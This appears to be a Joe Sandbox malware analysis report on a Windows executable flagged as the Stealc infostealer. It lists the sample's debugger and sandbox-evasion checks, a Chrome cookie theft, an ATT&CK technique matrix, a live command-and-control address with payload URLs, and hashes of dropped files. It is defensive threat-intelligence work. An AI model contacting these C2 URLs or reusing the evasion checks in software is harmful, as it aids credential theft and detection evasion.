Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR

Source: file.exe	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.2545094889.0000000000C34000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	1 Masquerading	1 OS Credential Dumping	641 Security Software Discovery	Remote Services	1 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	222 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	37%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://185.215.113.100/e2b1563c6670f193.php	100%	URL Reputation	malware
http://185.215.113.100/e2b1563c6670f193.php	100%	URL Reputation	malware
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
http://185.215.113.100	100%	URL Reputation	malware
http://upx.sf.net	0%	URL Reputation	safe
http://185.215.113.100/	100%	URL Reputation	malware
http://185.215.113.100/e2b1563c6670f193.phpi	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.	100%	Avira URL Cloud	malware
http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/sqlite3.dllK	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpo	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpo	7%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpU	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpion:	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpi	8%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpser	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	100%	Avira URL Cloud	malware
http://185.215.1	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.php9	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpinit.exe	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/sqlite3.dllK	11%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpion:	6%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpser	18%	Virustotal		Browse
http://185.215.113.100Local	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.phpU	11%	Virustotal		Browse
http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_	100%	Avira URL Cloud	malware
http://185.215.1	0%	Virustotal		Browse
http://185.215.113.100s.exe	0%	Avira URL Cloud	safe
http://185.215.113.100DBG	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.phpinit.exe	18%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php9	7%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.php&	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpf	100%	Avira URL Cloud	malware
http://185.215.113.100Dm	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.php&	8%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpf	7%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	16%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/e2b1563c6670f193.php	true	URL Reputation: malware URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.100/	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/e2b1563c6670f193.phpi	file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG	file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.	file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpo	file.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dllK	file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpion:	file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100	file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpU	file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.1	file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php9	file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpinit.exe	file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100Local	file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_	file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100DBG	file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100s.exe	file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php&	file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100Dm	file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.100	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502494
Start date and time:	2024-09-01 23:02:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/6@0/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 2800 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
17:03:21	API Interceptor	560961x Sleep call for process: file.exe modified
17:04:22	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.100	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/0d60be0de163924d/sqlite3.dll
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_455b5ddbe96ff1fb6e298df1c6cfe599588679_6983241a_cd0d6090-ee71-407c-9713-1cba797ca396\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.971582409668952
Encrypted:	false
SSDEEP:	192:QvdLK7UUv4Plh0BU/fI3juCZr+diWzuiFIZ24IO8TVB:KU4NiBU/YjW/zuiFIY4IO8X
MD5:	ED814D481BBEC172B5CF6CEB8F3D30FE
SHA1:	7896845691D3D216868F995BE837804B73D15434
SHA-256:	7A94D3E2ABF1A9ADEB683194E51CB27A86FC8FF60B29A533C97865123BB77155
SHA-512:	4E12B76F9DF87E9A631DEAA9648D0657389E9F0E75B624771E6F5EE64F9B584636BCA2AAEF5C43329716D7DA685B2E43F71221F12D779E9D36350E05111BC04D
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.6.9.8.2.4.2.5.5.3.3.9.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.6.9.8.2.4.3.8.3.4.6.4.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.0.d.6.0.9.0.-.e.e.7.1.-.4.0.7.c.-.9.7.1.3.-.1.c.b.a.7.9.7.c.a.3.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.a.a.6.d.7.5.-.f.f.3.6.-.4.a.f.7.-.b.4.b.4.-.a.5.5.2.b.7.5.5.f.5.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.f.0.-.0.0.0.1.-.0.0.1.4.-.4.0.6.f.-.7.7.4.e.b.2.f.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.1.6.d.b.1.1.8.1.e.c.4.d.5.4.a.1.f.e.2.a.e.d.1.f.2.5.a.0.b.d.4.7.d.5.3.c.e.e.7.2.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER19B0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Sep 1 21:04:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	271522
Entropy (8bit):	1.4028254967951126
Encrypted:	false
SSDEEP:	384:2YIUI22eEveni+bQK8d3NnKxjwHgl69ZAyBdYG6l1iedu3l/cYM+YZZshgfN:sUIHeEyipK8ddUjwHgsTYFu1kae
MD5:	B6C01AFFD3B1CCE67E3BF08E634D49B0
SHA1:	069F4C508C9E0B83433374577434457824271DDE
SHA-256:	1063E1A938A37EC74B604788EA3FD0C0853D6E2C5414E509E0739961BC7EC00B
SHA-512:	BCC27A9EC1B0529B466D55B509FE120C11CBA7B105C87B8BD2DB500577A52A6A390CEEF4873BEF139B6035D999C75B6EB27D85C2F373A526EF5EE0686A0414AE
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............4...........`...<...........6...........T.......8...........T............<...............#...........%..............................................................................eJ...... &......GenuineIntel............T...........{..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B67.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8374
Entropy (8bit):	3.702450459318866
Encrypted:	false
SSDEEP:	192:R6l7wVeJGC66X6Y9aSU9q/gmfBHyprHq89by5sfc+Gm:R6lXJI6X6YgSU9ygmfBcySfcW
MD5:	1D800CC57CA32435AA221C15F057B1DB
SHA1:	1297A7FDD9525DC799A273EEF171450C5AFEC2FD
SHA-256:	04ED64E6197C3F578BB44292815B2A90E1B5E338809463BA4DBA65E5C7F18229
SHA-512:	922F4CF824A82E91F9B22489AD6C8C60B5543D72E72C71D56F530298EA8023B2FF3E6CEBF3ACD08CB972EA46D1491CE306F991F677CEB9A88997AE7FFE9FA7E0
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C04.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4594
Entropy (8bit):	4.474310381861214
Encrypted:	false
SSDEEP:	48:cvIwWl8zsXJg77aI9IrWpW8VYjYm8M4JIqFB6z+q8jfZUyO+7Fd:uIjf5I7aa7VDJzcsZU6Fd
MD5:	4BB151137508D9A0EC566D5FB5CC7AF5
SHA1:	1CDBC31780AFB99F732571D88704B4D6CDC24B89
SHA-256:	4518913557220CE3854768BFED458A7316D347AEA5093D84F6091957777C7B7D
SHA-512:	8C867D5D1BA8727F77CC14D116F220516393666DB4554E8D01C08C001575B443E6DA99AF10117A9C0D3F5006C05EE9575F6777B05896C975237BEB16B6D9B2CC
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="481686" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465312369399602
Encrypted:	false
SSDEEP:	6144:EIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb3T:5XD94+WlLZMM6YFH1+3T
MD5:	24078A75F78A4D897C5A52AB6FB4E89B
SHA1:	A7061EB5781197B4CF48B2034F0E1D65648B9E6A
SHA-256:	2A6EC806E5A1658208F3DD0763C68B40658CCC05006E5E3C1B9E561DCCD88000
SHA-512:	0BDFC366BAD6DE9ACEA4F2ECD1044B15FD24AE92773FB5BE59F76D1556C7041F3F9EF3EE4F2D8743DB638325F2F6532EAED2DDB949532A2831946F3D85D33166
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...x...................................................................................................................................................................................................................................................................................................................................................L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
